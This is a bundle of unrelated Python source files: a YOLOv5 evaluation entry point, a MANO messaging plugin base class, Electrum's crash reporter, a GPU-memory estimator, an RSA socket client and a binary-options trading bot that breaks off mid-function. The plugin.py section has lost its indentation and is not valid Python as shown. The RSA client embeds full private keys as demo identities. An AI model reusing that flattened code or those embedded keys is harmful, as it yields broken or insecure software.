    return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
    # Command-line entry point: parse options into the module-level 'opt'
    # namespace that test() reads when called standalone.
    parser = argparse.ArgumentParser(prog='test.py')
    parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
    parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
    parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
    parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
    parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
    parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
    parser.add_argument('--task', default='val', help="'val', 'test', 'study'")
    parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
    parser.add_argument('--augment', action='store_true', help='augmented inference')
    parser.add_argument('--verbose', action='store_true', help='report mAP by class')
    parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
    parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
    parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
    parser.add_argument('--project', default='runs/test', help='save to project/name')
    parser.add_argument('--name', default='exp', help='save to project/name')
    parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
    opt = parser.parse_args()
    # COCO data always gets a pycocotools-compatible JSON dump.
    opt.save_json |= opt.data.endswith('coco.yaml')
    opt.data = check_file(opt.data) # check file
    print(opt)
    if opt.task in ['val', 'test']: # run normally
        test(opt.data,
             opt.weights,
             opt.batch_size,
             opt.img_size,
             opt.conf_thres,
             opt.iou_thres,
             opt.save_json,
             opt.single_cls,
             opt.augment,
             opt.verbose,
             save_txt=opt.save_txt,
             save_conf=opt.save_conf,
             )
    elif opt.task == 'study': # run over a range of settings and save/plot
        # Speed/mAP study: sweep image sizes for each pretrained model and
        # save one result file per model.
        for weights in ['yolov5s.pt', 'yolov5m.pt', 'yolov5l.pt', 'yolov5x.pt']:
            f = 'study_%s_%s.txt' % (Path(opt.data).stem, Path(weights).stem) # filename to save to
            x = list(range(320, 800, 64)) # x axis
            y = [] # y axis
            for i in x: # img-size
                print('\nRunning %s point %s...' % (f, i))
                r, _, t = test(opt.data, weights, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
                               plots=False)
                y.append(r + t) # results and times
            np.savetxt(f, y, fmt='%10.4g') # save
            os.system('zip -r study.zip study_*.txt')
        plot_study_txt(f, x) # plot
|
plugin.py | """
Created by Manuel Peuster <manuel@peuster.de>
Base class to simplify the implementation of new MANO plugins.
"""
import logging
import json
import time
import threading
from sonmanobase import messaging
# Module-level logger: root configured at INFO, this plugin's logger at DEBUG.
logging.basicConfig(level=logging.INFO)
LOG = logging.getLogger("son-mano-base:plugin")
LOG.setLevel(logging.DEBUG)
class ManoBasePlugin(object):
"""
Abstract class that should be inherited by other MANO plugins.
This class provides basic mechanisms to
- connect to the broker
- send/receive async/sync request/response calls
- send/receive notifications
- register / de-register plugin to plugin manager
It also implements a automatic heartbeat mechanism that periodically sends
heartbeat notifications.
"""
def __init__(self,
name="son-plugin",
version=None,
description=None,
auto_register=True,
wait_for_registration=True,
auto_heartbeat_rate=0.5):
"""
Performs plugin initialization steps, e.g., connection setup
:param name: Plugin name prefix
:param version: Plugin version
:param description: A description string
:param auto_register: Automatically register on init
:param wait_for_registration: Wait for registration before returning from init
:param auto_heartbeat_rate: rate of automatic heartbeat notifications 1/n seconds. 0=deactivated
:return:
"""
self.name = "%s.%s" % (name, self.__class__.__name__)
self.version = version
self.description = description
self.uuid = None # uuid given by plugin manager on registration
self.state = None # the state of this plugin READY/RUNNING/PAUSED/FAILED
LOG.info(
"Starting MANO Plugin: %r ..." % self.name)
# create and initialize broker connection
self.manoconn = messaging.ManoBrokerRequestResponseConnection(self.name)
# register subscriptions
self.declare_subscriptions()
# register to plugin manager
if auto_register:
self.register()
if wait_for_registration:
self._wait_for_registration()
# add additional subscriptions
self._register_lifecycle_endpoints()
# kick-off automatic heartbeat mechanism
self._auto_heartbeat(auto_heartbeat_rate)
# jump to run
self.run()
def __del__(self):
"""
Actions done when plugin is destroyed.
:return:
"""
# de-register this plugin
self.deregister()
self.manoconn.stop_connection()
del self.manoconn
def _auto_heartbeat(self, rate):
"""
A simple periodic heartbeat mechanism.
(much room for improvements here)
:param rate: rate of heartbeat notifications
:return:
"""
if rate <= 0:
return
def run():
while True:
if self.uuid is not None:
self._send_heartbeat()
time.sleep(1/rate)
# run heartbeats in separated thread
t = threading.Thread(target=run)
t.daemon = True
t.start()
def _send_heartbeat(self):
self.manoconn.notify(
"platform.management.plugin.%s.heartbeat" % str(self.uuid),
json.dumps({"uuid": self.uuid,
"state": str(self.state)}))
def declare_subscriptions(self):
"""
Can be overwritten by subclass.
But: The this superclass method should be called in any case.
"""
# plugin status update subscription
self.manoconn.register_notification_endpoint(
self.on_plugin_status_update, # call back method
"platform.management.plugin.status")
def run(self):
"""
To be overwritten by subclass
"""
# go into infinity loop (we could do anything here)
while True:
time.sleep(1)
def on_lifecycle_start(self, ch, method, properties, message):
"""
To be overwritten by subclass
"""
LOG.debug("Received lifecycle.start event.")
self.state = "RUNNING"
def on_lifecycle_pause(self, ch, method, properties, message):
"""
To be overwritten by subclass
"""
LOG.debug("Received lifecycle.pause event.")
self.state = "PAUSED"
def on_lifecycle_stop(self, ch, method, properties, message):
"""
To be overwritten by subclass
"""
LOG.debug("Received lifecycle.stop event.")
self.deregister()
exit(0)
def on_registration_ok(self):
"""
To be overwritten by subclass
"""
LOG.debug("Received registration ok event.")
pass
def on_plugin_status_update(self, ch, method, properties, message):
"""
To be overwritten by subclass.
Called when a plugin list status update
is received from the plugin manager.
"""
LOG.debug("Received plugin status update %r." % str(message))
def register(self):
"""
Send a register request to the plugin manager component to announce this plugin.
"""
message = {"name": self.name,
"version": self.version,
"description": self.description}
self.manoconn.call_async(self._on_register_response,
"platform.management.plugin.register",
json.dumps(message))
def _on_register_response(self, ch, method, props, response):
    """
    Event triggered when register response is received.

    On success stores the UUID assigned by the plugin manager, marks the
    plugin READY, fires on_registration_ok() and sends the first
    heartbeat. On failure the process terminates.

    :param ch: broker channel
    :param method: broker delivery method
    :param props: response properties
    :param response: response body (JSON-encoded bytes)
    :return: None
    """
    import sys  # local import; this file's import list is outside this view
    response = json.loads(str(response, "utf-8"))
    if response.get("status") != "OK":
        LOG.debug("Response %r" % response)
        LOG.error("Plugin registration failed. Exit.")
        # sys.exit() instead of the site-injected exit() builtin
        sys.exit(1)
    self.uuid = response.get("uuid")
    # mark this plugin to be ready to be started
    self.state = "READY"
    LOG.info("Plugin registered with UUID: %r" % response.get("uuid"))
    # jump to on_registration_ok()
    self.on_registration_ok()
    self._send_heartbeat()
def deregister(self):
    """
    Send a deregister event to the plugin manager component.

    Publishes this plugin's UUID and installs _on_deregister_response
    as the asynchronous reply callback.
    """
    LOG.info("De-registering plugin...")
    message = {"uuid": self.uuid}
    self.manoconn.call_async(self._on_deregister_response,
                             "platform.management.plugin.deregister",
                             json.dumps(message))
def _on_deregister_response(self, ch, method, props, response):
    """
    Event triggered when de-register response is received.

    Terminates the process if the plugin manager did not acknowledge the
    de-registration.

    :param ch: broker channel
    :param method: broker delivery method
    :param props: response properties
    :param response: response body (JSON-encoded bytes)
    :return: None
    """
    import sys  # local import; this file's import list is outside this view
    response = json.loads(str(response, "utf-8"))
    if response.get("status") != "OK":
        LOG.error("Plugin de-registration failed. Exit.")
        # sys.exit() instead of the site-injected exit() builtin
        sys.exit(1)
    LOG.info("Plugin de-registered.")
def _wait_for_registration(self, timeout=5, sleep_interval=0.1):
    """
    Busy-wait until registration completed (self.uuid is set) or the
    timeout elapsed. (not nice, but ok for now)

    :param timeout: max wait in seconds
    :param sleep_interval: polling interval in seconds
    :return: None
    """
    # FIXME: Use threading.Event() for this?
    waited = 0
    LOG.debug("Waiting for registration (timeout=%d) ..." % timeout)
    while self.uuid is None and waited < timeout:
        time.sleep(sleep_interval)
        waited += sleep_interval
def _register_lifecycle_endpoints(self):
    """
    Subscribe to this plugin's lifecycle topics (start/pause/stop).

    Does nothing until the plugin has registered and received a UUID.
    """
    if self.uuid is None:
        return
    lifecycle_handlers = (
        ("start", self.on_lifecycle_start),
        ("pause", self.on_lifecycle_pause),
        ("stop", self.on_lifecycle_stop),
    )
    for event_name, callback in lifecycle_handlers:
        self.manoconn.register_notification_endpoint(
            callback,  # call back method
            "platform.management.plugin.%s.lifecycle.%s"
            % (str(self.uuid), event_name))
|
base_crash_reporter.py | # Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import subprocess
import sys
import os
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger
class BaseCrashReporter(Logger):
    """Collect crash information (traceback + environment) and POST it
    as JSON to the Electrum crash hub.

    GUI front ends subclass this and implement get_user_description()
    and get_wallet_type().
    """
    report_server = "https://crashhub.electrum.org"
    config_key = "show_crash_reporter"
    issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
    CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
    CRASH_TITLE = _('Sorry!')
    REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
                             'useful debug information:')
    DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
    ASK_CONFIRM_SEND = _("Do you want to send this report?")

    def __init__(self, exctype, value, tb):
        """Store the (exc_type, exc_value, traceback) triple to report."""
        Logger.__init__(self)
        self.exc_args = (exctype, value, tb)

    def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
        """Build the crash report and POST it to the crash hub.

        :param asyncio_loop: loop the HTTP coroutine is scheduled on
        :param proxy: proxy settings forwarded to the aiohttp session
        :param endpoint: server path, default "/crash"
        :param timeout: seconds to wait for the round trip (None = forever)
        :return: response body text
        :raises Exception: when running on an altcoin chain but still
            pointing at the electrum.org crash hub
        """
        if constants.net.GENESIS[-4:] not in ["4943", "e26f"] and ".electrum.org" in BaseCrashReporter.report_server:
            # Gah! Some kind of altcoin wants to send us crash reports.
            raise Exception(_("Missing report URL."))
        report = self.get_traceback_info()
        report.update(self.get_additional_info())
        report = json.dumps(report)
        coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
        response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
        return response

    async def do_post(self, proxy, url, data):
        """POST *data* to *url* and return the response body as text."""
        async with make_aiohttp_session(proxy) as session:
            async with session.post(url, data=data) as resp:
                return await resp.text()

    def get_traceback_info(self):
        """Return a dict describing the stored exception: its string form,
        a formatted stack, and an "id" dict used for de-duplication."""
        exc_string = str(self.exc_args[1])
        stack = traceback.extract_tb(self.exc_args[2])
        readable_trace = "".join(traceback.format_list(stack))
        # renamed from "id" so the builtin is not shadowed; JSON key stays "id"
        exc_id = {
            "file": stack[-1].filename,
            "name": stack[-1].name,
            "type": self.exc_args[0].__name__
        }
        return {
            "exc_string": exc_string,
            "stack": readable_trace,
            "id": exc_id
        }

    def get_additional_info(self):
        """Collect environment details; every probe is best-effort."""
        args = {
            "app_version": ELECTRUM_VERSION,
            "python_version": sys.version,
            "os": describe_os_version(),
            "wallet_type": "unknown",
            "locale": locale.getdefaultlocale()[0] or "?",
            "description": self.get_user_description()
        }
        try:
            args["wallet_type"] = self.get_wallet_type()
        except Exception:
            # Maybe the wallet isn't loaded yet
            # (was a bare "except:", which also caught SystemExit etc.)
            pass
        try:
            args["app_version"] = self.get_git_version()
        except Exception:
            # This is probably not running from source
            pass
        return args

    @staticmethod
    def get_git_version():
        """Return `git describe` output for the source checkout.

        Raises (e.g. CalledProcessError) when not run from a git tree.
        """
        # renamed from "dir" so the builtin is not shadowed
        repo_dir = os.path.dirname(os.path.realpath(sys.argv[0]))
        version = subprocess.check_output(
            ['git', 'describe', '--always', '--dirty'], cwd=repo_dir)
        return str(version, "utf8").strip()

    def _get_traceback_str(self) -> str:
        """Full formatted traceback of the stored exception."""
        return "".join(traceback.format_exception(*self.exc_args))

    def get_report_string(self):
        """Human-readable (HTML) version of the report, for preview UIs."""
        info = self.get_additional_info()
        info["traceback"] = self._get_traceback_str()
        return self.issue_template.format(**info)

    def get_user_description(self):
        raise NotImplementedError

    def get_wallet_type(self) -> str:
        raise NotImplementedError
def trigger_crash():
    """Deliberately raise an exception in a helper thread, exercising the
    crash reporter end to end."""
    # note: do not change the type of the exception, the message,
    # or the name of this method. All reports generated through this
    # method will be grouped together by the crash reporter, and thus
    # don't spam the issue tracker.
    import threading

    class TestingException(Exception):
        pass

    def crash_test():
        raise TestingException("triggered crash for testing purposes")

    crash_thread = threading.Thread(target=crash_test)
    crash_thread.start()
|
estGPUSize.py | #Parts of code in this file have been taken (copied) from https://github.com/ml-jku/lsc
#Copyright (C) 2018 Andreas Mayr
from __future__ import print_function
from __future__ import division
import numpy as np
import scipy
import scipy.sparse
import pandas as pd
import itertools
import pickle
#import imp
import os
import pathlib
from multiprocessing import Process, Manager, Array
import tensorflow as tf
# Hide all GPUs while the parent process imports TF; each measurement later
# runs in a fresh child process with CUDA_VISIBLE_DEVICES set below.
os.environ['CUDA_VISIBLE_DEVICES'] = ''
# NOTE(review): tf.ConfigProto is TensorFlow 1.x API — this script assumes TF1.
gpu_options=tf.ConfigProto()
gpu_options.gpu_options.allow_growth=True
import time
import gc
import argparse
import utilsLib
import actLib
basePath=os.getcwd()
# project root: everything above the 'python_code' directory
catalog=basePath.split('python_code')[0]
methodPath = basePath+'/python_code/gc/'
#np.set_printoptions(threshold='nan')
# print/display settings only — no effect on the measurements
np.set_printoptions(threshold=1000)
np.set_printoptions(linewidth=160)
np.set_printoptions(precision=4)
np.set_printoptions(edgeitems=15)
np.set_printoptions(suppress=True)
pd.set_option('display.width', 160)
pd.options.display.float_format = '{:.2f}'.format
# command line interface
parser = argparse.ArgumentParser()
parser.add_argument("-availableGPU", help="GPU for Test", type=int, default=0)
parser.add_argument("-originalData", help="Path for original data", type=str,default=catalog+'/test_data/')
parser.add_argument("-featureoutname", help="pckl file name", type=str, default="test")
parser.add_argument("-datasetNames", help="DatasetNames", nargs='+', type=str, default=["graphConv"])
parser.add_argument("-saveBasePath", help="saveBasePath", type=str,default=catalog+'/res_test_data/')
args = parser.parse_args()
availableGPU=args.availableGPU
dataPathSave=args.originalData
featureoutname = args.featureoutname
datasetNames=args.datasetNames
saveBasePath=args.saveBasePath
if not os.path.exists(saveBasePath):
    os.makedirs(saveBasePath)
# from here on, child processes will see exactly this one GPU
os.environ['CUDA_VISIBLE_DEVICES']=str(availableGPU)
# For every dataset: spawn one child process per hyper-parameter row, run a
# single train + inference step, and record how much GPU memory it used;
# finally record the total memory of the GPU for normalisation.
for datasetName in datasetNames:
    savePath=saveBasePath+datasetName+"/"
    if not os.path.exists(savePath):
        os.makedirs(savePath)
    batchSize=128
    # pulls hyperParams (indexed table of settings) into globals()
    exec(open(methodPath+'hyperparams.py').read(), globals())
    graphInputData=None
    denseOutputData=None
    sparseOutputData=None
    # pulls graphInputData / denseOutputData / sparseOutputData into globals()
    exec(open(methodPath+'loadData.py').read(), globals())
    if not denseOutputData is None:
        nrOutputTargets=denseOutputData.shape[1]
    if not sparseOutputData is None:
        nrOutputTargets=sparseOutputData.shape[1]
    manager=Manager()
    # shared across processes: GPU bytes used per hyper-parameter setting
    sizeArray = Array("l", [0]*hyperParams.shape[0])
    def myfuncHyper():
        # Runs in a child process: build the model for hyperParams row
        # `paramNr` (inherited module global), run one training and one
        # inference step, then store the GPU footprint in sizeArray[paramNr].
        import pynvml
        pynvml.nvmlInit()
        deviceCount = pynvml.nvmlDeviceGetCount()
        handle=pynvml.nvmlDeviceGetHandleByIndex(int(os.environ['CUDA_VISIBLE_DEVICES']))
        gpuMem=pynvml.nvmlDeviceGetMemoryInfo(handle)
        print("Init")
        print(gpuMem.used)
        # builds `model`, `batchFunc`, `updateOps`, ... in globals()
        exec(open(methodPath+'models.py').read(), globals())
        # NOTE(review): np.random.random_integers is deprecated (removed in
        # recent NumPy) and its upper bound is INCLUSIVE, so this can draw
        # index == len(graphInputData) and raise IndexError; should be
        # np.random.randint(0, len(graphInputData), batchSize).
        randSamples=np.random.random_integers(0, len(graphInputData), batchSize)
        batchGraphX=graphInputData[randSamples]
        batchDenseY=denseOutputData[randSamples]
        batchInputSingle=[mychemblConvertedMols[molX] for molX in batchGraphX]
        batchInput=batchFunc(model, batchInputSingle)
        myfeedDict=batchInput
        myfeedDict[model.label]=(batchDenseY>0.5).astype(np.integer)
        myfeedDict[model.weights]=(np.abs(batchDenseY)>0.5).astype(np.integer)
        myfeedDict[model._training_placeholder]=1.0
        with model._get_tf("Graph").as_default():
            try:
                model.session.run([model._get_tf('train_op'), updateOps], feed_dict=myfeedDict)
            except:
                # best-effort: even a failed step still tells us the footprint
                print("Error in Training!")
        myfeedDict=batchInput
        myfeedDict[model._training_placeholder]=0.0
        with model._get_tf("Graph").as_default():
            myres=model.session.run(model.outputs[0], feed_dict=myfeedDict)
        print("GPU")
        gpuMem=pynvml.nvmlDeviceGetMemoryInfo(handle)
        sizeArray[paramNr]=gpuMem.used
        print(gpuMem.used)
    # one fresh process per setting so TF releases GPU memory in between
    for paramNr in range(0, hyperParams.shape[0]):
        p = Process(target=myfuncHyper)
        p.start()
        p.join()
    sizeArr=np.array(sizeArray)
    sizeArr.tofile(savePath+"hyperSize.npy")
    totalSize = Array("l", [0])
    def myfuncTotal():
        # Child process: query the total memory of the visible GPU.
        import pynvml
        pynvml.nvmlInit()
        deviceCount = pynvml.nvmlDeviceGetCount()
        handle=pynvml.nvmlDeviceGetHandleByIndex(int(os.environ['CUDA_VISIBLE_DEVICES']))
        gpuMem=pynvml.nvmlDeviceGetMemoryInfo(handle)
        totalMem=gpuMem.total
        totalSize[0]=totalMem
    p = Process(target=myfuncTotal)
    p.start()
    p.join()
    totalSize=np.array(totalSize)
    totalSize.tofile(savePath+"totalSize.npy")
    print(datasetName)
    # fraction of total GPU memory needed by each hyper-parameter setting
    print(sizeArr/totalSize[0])
    print(np.max(sizeArr/totalSize[0]))
|
client.py | import socket
import threading
import sys
import rsa
import pickle
import hashlib
import json
#Wait for incoming data from server
#.decode is used to turn the message in bytes to a string
# Client-side state, filled in as the user interacts with the server.
challange = ''  # last challenge string received from the server ("challange" sic)
pubkey = ''     # rsa.PublicKey once generated/loaded; '' before that
privkey = ''    # matching rsa.PrivateKey
email = ''      # identity announced to the server
host = "localhost"
port = 1818
'''
connect(pubkey,privkey,email,challange) sends your signed PublicKey and email to the server in order to be authenticated
'''
def connect(pubkey, privkey, email, challange):
    """Send our signed public key + email (+ server challenge) so the
    server can authenticate us."""
    payload = 'pk {} {} email {} chal {}'.format(
        pubkey.n, pubkey.e, email, challange)
    signature = rsa.sign(payload.encode('utf-8'), privkey, 'SHA-256').hex()
    message = payload + ' ' + signature
    sock.sendall(message.encode())
    print('sending ' + message)
'''
VerifyBlock(block) verify the block sent by the server by checking all signature of new nodes in the current block
answer with the signature of the block's hash if the block is valid,
answer with the hash of the current block if it is invalid
'''
def VerifyBlock(block):
    """
    Verify the block sent by the server by checking the signature of every
    new node contained in it.

    Answers the server with our signature over the block's hash when the
    block is valid, or echoes the block hash back when it is invalid.

    :param block: [_, _, entries, block_hash] where each entry is
        ((n, e), email, challenge, signature_hex)
    :return: 0
    """
    ver = 1
    print("verifying block validity")
    for i in block[2]:
        message = 'pk' + ' ' + str(i[0][0]) + ' ' + str(i[0][1]) + ' ' + 'email' + ' ' + i[1] + ' ' + 'chal' + ' ' + i[2]
        pk = rsa.PublicKey(i[0][0], i[0][1])
        sign = i[3]
        # NOTE(review): rsa.verify raises VerificationError on an invalid
        # signature instead of returning, so a bad entry aborts with an
        # exception rather than reaching the ver = 0 branch — confirm intended.
        hashing = rsa.verify(message.encode('utf-8'), bytes.fromhex(sign), pk)
        print(hashing)
        if hashing == 'SHA-256':
            ver = ver and 1
        else:
            ver = 0
    if ver:
        signatureblock = rsa.sign(block[3].encode('utf-8'), privkey, 'SHA-256').hex()
        strpubkey = str(pubkey.n) + ' ' + str(pubkey.e)
        verify = 'pk ' + strpubkey + ' ' + 'email ' + email + ' ' + 'sign ' + signatureblock
        signature = rsa.sign(verify.encode('utf-8'), privkey, 'SHA-256').hex()
        verify = verify + ' ' + signature
        sock.sendall(str.encode(verify))
        print('sending consensus answer yes :')
        print(verify)
    else:
        # BUG FIX: this branch used to assign to a misspelled "trpubkey" and
        # then read the undefined "strpubkey", raising NameError whenever a
        # block failed verification.
        strpubkey = str(pubkey.n) + ' ' + str(pubkey.e)
        verify = 'pk ' + strpubkey + ' ' + 'email ' + email + ' ' + 'sign ' + block[3]
        signature = rsa.sign(verify.encode('utf-8'), privkey, 'SHA-256').hex()
        verify = verify + ' ' + signature
        sock.sendall(str.encode(verify))
        print('sending consensus answer no')
    return 0
'''
receive(socket, signal) manages received messages
'''
def receive(socket, signal):
    """Background loop: dispatch every message coming from the server.

    Blocks are JSON arrays (start with '['), 'challange <value>' updates the
    global challenge, anything else is just printed.
    """
    global challange
    while signal:
        try:
            data = socket.recv(2048).decode()
            if data[0] == '[':
                # JSON-encoded block -> run consensus verification
                print('received block')
                VerifyBlock(json.loads(data))
            else:
                parsed = data.split()
                if parsed[0] == 'challange':
                    challange = parsed[1]
                    print('received challange ' + challange)
                else:
                    print(data)
        except Exception as e:
            print("You have been disconnected from the server")
            print(e)
            signal = False
            break
#Attempt to connect to the server
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
except:
    # NOTE(review): bare except also swallows KeyboardInterrupt here
    print("Could not make a connection to the server")
    input("Press enter to quit")
    sys.exit(0)
# background thread that handles everything the server sends
receiveThread = threading.Thread(target = receive, args = (sock, True))
receiveThread.start()
#managing the client input in order to facilitate the comunication with the server by automatically formatting the messages
while True:
    message = input()
    if message == "disconnect":
        sock.close()
        break
    elif message == "generate key":
        (pubkey, privkey) = rsa.newkeys(1024)
        print(pubkey,privkey)
    elif message == "set email":
        email = input()
    elif message == "connect 1":
        # hard-coded demo identity #1 (test keys only)
        email = 'root1@test.it'
        pubkey = rsa.PublicKey(119770777999616036964482036516193989899837494454402262212320174845526315404803216372320908306890372744930417223903886098713646467509959684974498601907444633130871922367704281375480264549968160821209935332888725265017711576900685345115234860380091711666493101127543579986394987372953112289819973821762408459967, 65537)
        privkey = rsa.PrivateKey(119770777999616036964482036516193989899837494454402262212320174845526315404803216372320908306890372744930417223903886098713646467509959684974498601907444633130871922367704281375480264549968160821209935332888725265017711576900685345115234860380091711666493101127543579986394987372953112289819973821762408459967, 65537, 26672787965643774653960592077053439775823248417870836580692020566557159670615117307078805205289607248001273164515879848188438137133342411190667965317897481933437357035191631621435183169027975469714776027703265905819830236529825367804990665646494281767030763234952167320037607890847457162373522698431596532433, 44659137180340759958876268803910738747846956308877335366447217803000626835077167992126311203807815386442987763059259322597082273294981350200211351269897238930582823, 2681887415691942777453365642395488321778607617182533102316008461281165410069044712411935606017878562867819962411244465549964698676032292471234729)
        connect(pubkey,privkey,email,challange)
    elif message == "connect 2":
        # hard-coded demo identity #2 (test keys only)
        email = 'root2@test.it'
        pubkey = rsa.PublicKey(116004225281319987658573288348459366496825961115624594341053052723162029806559546870943101465716069245005380880466778730925720191554438789145759559892723660608772015906113267763487059561271967567199756257816686273390854357775870689254778084091408084059783060034916665868756548222191625642387394930123129730919, 65537)
        privkey = rsa.PrivateKey(116004225281319987658573288348459366496825961115624594341053052723162029806559546870943101465716069245005380880466778730925720191554438789145759559892723660608772015906113267763487059561271967567199756257816686273390854357775870689254778084091408084059783060034916665868756548222191625642387394930123129730919, 65537, 113320818876899872284198551861646354006031628798745779549087652599135699074503696388675836534119786824762950537076211012597395858576174156886959581017346963896001018404143622564211141719854525829550608916151368531836600479017473926312966740769334280199642829633488405627689309329200361626967289394328986603433, 42529141898798550074390381613514100832398610399548991394201753219908682699756557812504021128503749882433121509892134810553736929811847405998308431364025901191831659, 2727640862290642914891780043841902802059534011350400735385751755117353221263229955061265447186961196541215691807749681300629491007786242856113141)
        connect(pubkey,privkey,email,challange)
    elif message == "connect 3":
        # hard-coded demo identity #3 (test keys only)
        email = 'root3@test.it'
        privkey = rsa.PrivateKey(109408188808701462640681109534230415304054106571571409068865576027621529910922398951526070278451372101046352348576215241867114264747162101621938943056178439695690196413133683262343747311106890948975255893206864300355425778544110774780433868823662949090038382720445032632463499921195438372329573837611870173277, 65537, 45506474491300992876120761780270486759741991409958726212798979766192155329689086668899234779137066879814799558567512264492663193962843763494093910425610983554005997286234475141975340643742712015777804207496155334910020640773306453461045307844102122538866056278052833734250234103417673578143880763270663772853, 38196746067665208846318603661019859626469465948352325521601923806482253200289334112047295440512532950051393369177934693725502119802374393783504063188907822979385147, 2864332700353213131452119459146118535261726744960550663702850991242233277360099402842124943729519059624954124555522674428143485009472784984126791)
        pubkey = rsa.PublicKey(109408188808701462640681109534230415304054106571571409068865576027621529910922398951526070278451372101046352348576215241867114264747162101621938943056178439695690196413133683262343747311106890948975255893206864300355425778544110774780433868823662949090038382720445032632463499921195438372329573837611870173277, 65537)
        connect(pubkey,privkey,email,challange)
    elif message == "connect new":
        # generate a fresh identity and authenticate with it
        print("enter email")
        email = input()
        (pubkey, privkey) = rsa.newkeys(1024)
        print('generating keys')
        print((pubkey, privkey))
        connect(pubkey,privkey,email,challange)
    else:
        print('hello')
|
BinaryOptionAlgo.py | from iqoptionapi.stable_api import IQ_Option
import time, logging, configparser
from datetime import datetime, date, timedelta
from multiprocessing import Process
import os
import numpy as np
logging.disable(level=logging.DEBUG)
def get_balance(iqoapi):
    """Return the current account balance from the IQ Option API wrapper."""
    balance = iqoapi.get_balance()
    return balance
def get_payout(iqoapi, active):
    """Poll the current digital-option profit for *active* until the API
    returns one and give it back as a fraction (e.g. 87 -> 0.87)."""
    iqoapi.subscribe_strike_list(active, 1)
    payout = None
    while payout is None:
        raw = iqoapi.get_digital_current_profit(active, 1)
        if raw:
            payout = round(int(raw) / 100, 2)
        else:
            time.sleep(1)
    iqoapi.unsubscribe_strike_list(active, 1)
    return payout
def configuracao():
    """Read config.txt (in the working directory) and return the [GERAL]
    settings as a plain dict."""
    arquivo = configparser.RawConfigParser()
    arquivo.read('config.txt')
    chaves = ('sorosgale', 'levels', 'active', 'login', 'password')
    return {chave: arquivo.get('GERAL', chave) for chave in chaves}
def entradas(iqoapi, par, entrada, direcao, operacao):
    """Place a trade and block until its result is known.

    Returns (truthy_status, result rounded to 2 decimals) once the trade
    is resolved, or (False, 0) if the order could not be placed.
    operacao == 1 uses the digital-spot API, anything else the binary API.
    """
    digital = operacao == 1
    if digital:
        status, order_id = iqoapi.buy_digital_spot(par, entrada, direcao, 1)
    else:
        status, order_id = iqoapi.buy(entrada, par, direcao, 1)
    if not status:
        return False, 0
    # poll until the platform reports the final win/loss amount
    while True:
        if digital:
            done, valor = iqoapi.check_win_digital_v2(order_id)
        else:
            done, valor = iqoapi.check_win_v3(order_id)
        if done:
            # win and loss are reported the same way: the rounded amount
            return done, round(valor, 2)
def mhi_strategy(iqoapi, active):
    """MHI-style colour strategy on 5-minute candles.

    Looks at the colour of the six streamed candles: when all six are
    decided (no doji) and fewer than three are red, returns 'call'; fewer
    than three green, returns 'put'; otherwise None (no entry).
    """
    # candle length in seconds and number of candles kept in the stream
    size = 5 * 60
    max_dict = 6
    direction = None
    iqoapi.start_candles_stream(active, size, max_dict)
    velas = iqoapi.get_realtime_candles(active, size)
    inputs = {
        'open': np.array([]),
        'high': np.array([]),
        'low': np.array([]),
        'close': np.array([]),
        'volume': np.array([]),
        'at': np.array([])
    }
    for timestamp in velas:
        inputs['open'] = np.append(inputs['open'], velas[timestamp]['open'])
        inputs['close'] = np.append(inputs['close'], velas[timestamp]['close'])
        inputs['volume'] = np.append(inputs['volume'], velas[timestamp]['volume'])
    # classify each candle: 'g' green, 'r' red, 'd' doji
    for idx in range(6):
        if inputs['open'][idx] < inputs['close'][idx]:
            velas[idx] = 'g'
        elif inputs['open'][idx] > inputs['close'][idx]:
            velas[idx] = 'r'
        else:
            velas[idx] = 'd'
    cores = ' '.join(velas[idx] for idx in range(6))
    print('Cores total ', cores)
    color_candles = 3
    if (cores.count('g') + cores.count('r')) == 6:
